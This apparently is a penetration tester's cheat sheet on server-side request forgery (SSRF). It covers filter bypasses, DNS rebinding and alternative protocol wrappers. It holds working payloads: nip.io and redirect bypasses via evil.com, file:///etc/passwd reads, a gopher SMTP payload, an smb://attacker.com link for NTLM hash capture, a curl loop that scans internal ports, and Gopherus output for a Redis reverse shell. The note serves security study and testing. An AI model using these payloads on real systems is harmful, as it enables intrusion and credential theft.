🌐 Server Side Request Forgery (SSRF)

📚 Resource

• (SSRF) Attacks & How to Prevent Them
• PortSwigger resource
• vaadata pdf

curl Based SSRF

• curl Based SSRF Exploits Against Redis
• SSRF with cURL

What is SSRF

Server-Side Request Forgery (SSRF) is a vulnerability that allows an attacker to manipulate a server into making requests to unauthorized internal or external resources.

🎯 General Exploitation

• Access internal resources restrited: (e.g., http://127.0.0.1:8000/admin)

• Exfiltrate data: Read files via wrappers, interact with exposed databases

• Bypass security restrictions: Access APIs protected by an IP whitelist

Exploit Techniques

1. Bypassing Common Filters

Check this cheatsheet

Dynamic TLDs (Dynamic Domains)

127.0.0.1.nip.io
localhost.pentest-tools.com

Userinfo Bypass

http://user@127.0.0.1
http://admin:password@internal-service

Redirects & Open Redirects

http://evil.com/redirect?url=http://localhost:8000/admin

📌 Tips

Wrappers (Cyberbook wrappers) :

file://
http://
ftp://
gopher://
dict://
idapt://

↕️ DNS Rebiding

⚠️ Note: Simple services like nip.io might not work against advanced FQDN-based protections or strict DNS resolvers.
For a broader overview of DNS rebinding vectors and tools, see the dedicated DNS Rebinding cheatsheet.

DNS Rebinding is an attack where an attacker changes the IP address associated with a domain over time. The domain may first resolve to an attacker-controlled server, then later to an internal IP like 127.0.0.1, allowing access to internal services or enabling SSRF.

1. An attacker registers a domain (e.g., attacker.com) and configures their DNS server to dynamically change the associated IP:

2. Initially, attacker.com resolves to an attacker-controlled server.

3. Once the victim initiates the request, the DNS changes the IP to 127.0.0.1.

If the application dynamically resolves DNS, it will unknowingly send the request to an internal resource.

nip.io

To exploit an SSRF, we can used nip.io is a DNS wildcard that resolves a subdomain directly to an IP address without requiring DNS configuration.

127.0.0.1.nip.io | 127-0-0-1.nip.io # Resolve to 127.0.0.1
192-168-1-100.nip.io # Resolves to 192.168.1.100

ping foo.bar.something.127.0.0.1.nip.io = ping 127.0.0.1

If IP addresses are filtered, you can try to bypass the filter (See this resource)

Example

file_get_contents("http://example.com$_GET['url']")

An attacker can input evil DNS in GET parameter

.127.0.0.1.nip.io

file_get_contents("http://example.com.127.0.0.1.nip.io") # redirect to 127.0.0.1

Exploiting Alternative Protocols

Some services accept protocols other than HTTP:

• Gopher: Allows sending arbitrary requests

gopher://127.0.0.1:25/_MAIL%20FROM:attacker@example.com

• FTP, FILE, DICT:

file:///etc/passwd
ftp://user:pass@127.0.0.1/
dict://127.0.0.1:2628/

• SMB & LDAP Injection: Capturing NTLM hashes via SMB

smb://attacker.com/share

cURL based SSRF

If SSRF is found, the recon phase is important, through this vuln yoàu can discovery the port like MySQL, redis ...

For that, you can used burpsuite or juste cmand line :

for i in {1..10000}; do curl -s -i http://$URL --data "url=http://localhost:$i" | grep 'Content-Length'| xargs echo "$i:"; done

If you discover the server like redis, you can revshell through this service. Here is a good tool : Gopherus. The gopher or dict wrapper are very usefull because theses protocols not send the header unlike http.

./gopherus.py --exploit redis
> Output : gopher://IP:PORT/_%2A1%0D%0A...